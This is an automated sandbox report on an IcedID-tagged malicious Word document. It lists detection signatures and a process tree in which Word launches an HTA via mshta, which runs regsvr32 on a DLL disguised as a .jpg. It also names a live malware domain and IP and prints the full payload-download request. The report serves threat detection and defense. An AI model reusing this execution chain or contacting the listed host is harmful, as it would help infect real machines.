Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report charge_12.01.2021.doc

Overview

General Information

Sample Name:charge_12.01.2021.doc
Analysis ID:532355
MD5:18499830201cddade8183b8e24fdf30a
SHA1:55c498cf7273cab567f49a00c15ca3316c001215
SHA256:0a42f6762ae4f3b1d95aae0f8977cde6361f1d59b5ccc400c41772db0205f7c5
Tags:BokbotdocIcedIDmacrosShathakTA551Word
Infos:

Most interesting Screenshot:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Sigma detected: Register DLL with spoofed extension
Multi AV Scanner detection for submitted file
Sigma detected: Office product drops script at suspicious location
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document contains an embedded VBA macro which may execute processes
Sigma detected: Suspicious MSHTA Process Patterns
Sigma detected: Regsvr32 Anomaly
Machine Learning detection for sample
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Regsvr32 Command Line Without DLL
Document exploit detected (process start blacklist hit)
Sigma detected: Suspicious Regsvr32 Execution With Image Extension
Queries the volume information (name, serial number etc) of a device
Document has an unknown application name
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Potential document exploit detected (performs DNS queries)
Searches for user specific document files
Document misses a certain OLE stream usually present in this Microsoft Office document type
Document contains no OLE stream with summary information
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Document contains embedded VBA macros
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Document contains an embedded VBA macro which reads document properties (may be used for disguise)
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • WINWORD.EXE (PID: 7128 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)
    • explorer.exe (PID: 4756 cmdline: explorer youTube.hta MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
  • explorer.exe (PID: 5580 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: AD5296B280E8F522A8A897C96BAB0E1D)
    • mshta.exe (PID: 5368 cmdline: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\Documents\youTube.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} MD5: 7083239CE743FDB68DFC933B7308E80A)
      • regsvr32.exe (PID: 6688 cmdline: "C:\Windows\System32\regsvr32.exe" c:\users\public\dowNext.jpg MD5: 426E7499F6A7346F0410DEAD0805586B)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

barindex
Sigma detected: Suspicious MSHTA Process PatternsShow sources
Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\Documents\youTube.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} , CommandLine: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\Documents\youTube.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 5580, ProcessCommandLine: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\Documents\youTube.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} , ProcessId: 5368
Sigma detected: Regsvr32 AnomalyShow sources
Source: Process startedAuthor: Florian Roth, oscd.community: Data: Command: "C:\Windows\System32\regsvr32.exe" c:\users\public\dowNext.jpg, CommandLine: "C:\Windows\System32\regsvr32.exe" c:\users\public\dowNext.jpg, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\Documents\youTube.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} , ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 5368, ProcessCommandLine: "C:\Windows\System32\regsvr32.exe" c:\users\public\dowNext.jpg, ProcessId: 6688
Sigma detected: MSHTA Spawning Windows ShellShow sources
Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\regsvr32.exe" c:\users\public\dowNext.jpg, CommandLine: "C:\Windows\System32\regsvr32.exe" c:\users\public\dowNext.jpg, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\Documents\youTube.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} , ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 5368, ProcessCommandLine: "C:\Windows\System32\regsvr32.exe" c:\users\public\dowNext.jpg, ProcessId: 6688
Sigma detected: Regsvr32 Command Line Without DLLShow sources
Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Windows\System32\regsvr32.exe" c:\users\public\dowNext.jpg, CommandLine: "C:\Windows\System32\regsvr32.exe" c:\users\public\dowNext.jpg, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\Documents\youTube.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} , ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 5368, ProcessCommandLine: "C:\Windows\System32\regsvr32.exe" c:\users\public\dowNext.jpg, ProcessId: 6688
Sigma detected: Suspicious Regsvr32 Execution With Image ExtensionShow sources
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\regsvr32.exe" c:\users\public\dowNext.jpg, CommandLine: "C:\Windows\System32\regsvr32.exe" c:\users\public\dowNext.jpg, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\Documents\youTube.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} , ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 5368, ProcessCommandLine: "C:\Windows\System32\regsvr32.exe" c:\users\public\dowNext.jpg, ProcessId: 6688

Data Obfuscation:

barindex
Sigma detected: Register DLL with spoofed extensionShow sources
Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\regsvr32.exe" c:\users\public\dowNext.jpg, CommandLine: "C:\Windows\System32\regsvr32.exe" c:\users\public\dowNext.jpg, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\Documents\youTube.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} , ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 5368, ProcessCommandLine: "C:\Windows\System32\regsvr32.exe" c:\users\public\dowNext.jpg, ProcessId: 6688
Sigma detected: Office product drops script at suspicious locationShow sources
Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE, ProcessId: 7128, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\youTube.hta.LNK

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for submitted fileShow sources
Source: charge_12.01.2021.docReversingLabs: Detection: 29%
Machine Learning detection for sampleShow sources
Source: charge_12.01.2021.docJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll

Software Vulnerabilities:

barindex
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\explorer.exe
Source: global trafficDNS query: name: winrentals2017b.com
Source: global trafficTCP traffic: 192.168.2.3:49745 -> 194.62.42.207:80
Source: global trafficTCP traffic: 192.168.2.3:49745 -> 194.62.42.207:80
Source: global trafficHTTP traffic detected: GET /tegz/Q277aG7FkN9pAcaWDfFlGNBeuaqGed8i/baWexTQoGyAAzLR/AU1XErrU1FitjjV8BBaQuem65smQXYvyd/64063/g6fJYLGHRVWp7s1tvHnZdv/XcjcYCjBX8tPaALshiDAx85PEq/cab3?ref=0t&WzOZ=9xyAidN&z3d9Ob0=EwAUkUUNyHsk&user=4Zky89n&cid=bE5YBOFyZvWHbGv9wPr7QVm&q=lYkgZNGYoZpu9 HTTP/1.1Accept: */*Accept-Language: en-usAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: winrentals2017b.comConnection: Keep-Alive
Source: WINWORD.EXE, 00000001.00000002.569409734.000000000D050000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: WINWORD.EXE, 00000001.00000003.292217767.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292507382.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417778990.0000000010906000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571343617.0000000010907000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: WINWORD.EXE, 00000001.00000002.568255480.000000000B290000.00000004.00000001.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/drawingml/diagram
Source: WINWORD.EXE, 00000001.00000002.568255480.000000000B290000.00000004.00000001.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/drawingml/table-
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmpString found in binary or memory: http://schemas.microsoft.c
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: http://weather.service.msn.com/data.aspx
Source: mshta.exe, 00000007.00000002.312828178.0000000009EDF000.00000004.00000001.sdmp, mshta.exe, 00000007.00000003.310080125.0000000009EDF000.00000004.00000001.sdmp, mshta.exe, 00000007.00000003.309434578.0000000009EDF000.00000004.00000001.sdmpString found in binary or memory: http://winrentals2017b.com/
Source: mshta.exe, 00000007.00000003.310025721.00000000090E3000.00000004.00000040.sdmp, mshta.exe, 00000007.00000003.310184034.0000000005AD2000.00000004.00000001.sdmp, mshta.exe, 00000007.00000003.309172914.0000000009EB1000.00000004.00000001.sdmp, mshta.exe, 00000007.00000002.312682586.0000000005AD2000.00000004.00000001.sdmpString found in binary or memory: http://winrentals2017b.com/tegz/Q277aG7FkN9pAcaWDfFlGNBeuaqGed8i/baWexTQoGyAAzLR/AU1XErrU1FitjjV8BBa
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionloggingI
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: WINWORD.EXE, 00000001.00000003.292217767.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292507382.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417778990.0000000010906000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571343617.0000000010907000.00000004.00000001.sdmpString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalledA?V
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: WINWORD.EXE, 00000001.00000003.291974045.0000000010ADE000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292057510.0000000010AE3000.00000004.00000001.sdmpString found in binary or memory: https://addinslicensing.store.office.com/commerce/queryDeepLinkingServicehttps://api.addins.store.of
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://addinslicensing.store.office.com/entitlement/queryy
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove5
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/queryA?V
Source: WINWORD.EXE, 00000001.00000003.291974045.0000000010ADE000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292057510.0000000010AE3000.00000004.00000001.sdmpString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/queryBearer
Source: WINWORD.EXE, 00000001.00000003.291974045.0000000010ADE000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571659895.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://analysis.windows.net/powerbi/api
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://analysis.windows.net/powerbi/apiNIi
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://analysis.windows.net/powerbi/apidI
Source: WINWORD.EXE, 00000001.00000003.292217767.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292507382.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417778990.0000000010906000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571343617.0000000010907000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: WINWORD.EXE, 00000001.00000003.292217767.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292507382.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417778990.0000000010906000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571343617.0000000010907000.00000004.00000001.sdmpString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech(
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://api.aadrm.com
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://api.aadrm.com/
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://api.aadrm.com/x%
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://api.addins.omex.office.net/appstate/queryr
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://api.addins.store.office.com/addinstemplate
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://api.addins.store.office.com/app/query
Source: WINWORD.EXE, 00000001.00000003.291974045.0000000010ADE000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292057510.0000000010AE3000.00000004.00000001.sdmpString found in binary or memory: https://api.addins.store.office.com/app/queryAppStateQuery15https://api.addins.omex.office.net/appst
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://api.addins.store.office.com/app/queryl
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://api.addins.store.officeppe.com/addinstemplateb
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://api.cortana.ai
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://api.cortana.aiD#
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://api.diagnostics.office.com
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://api.diagnosticssdf.office.com
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://api.diagnosticssdf.office.como5
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://api.microsoftstream.com/api/
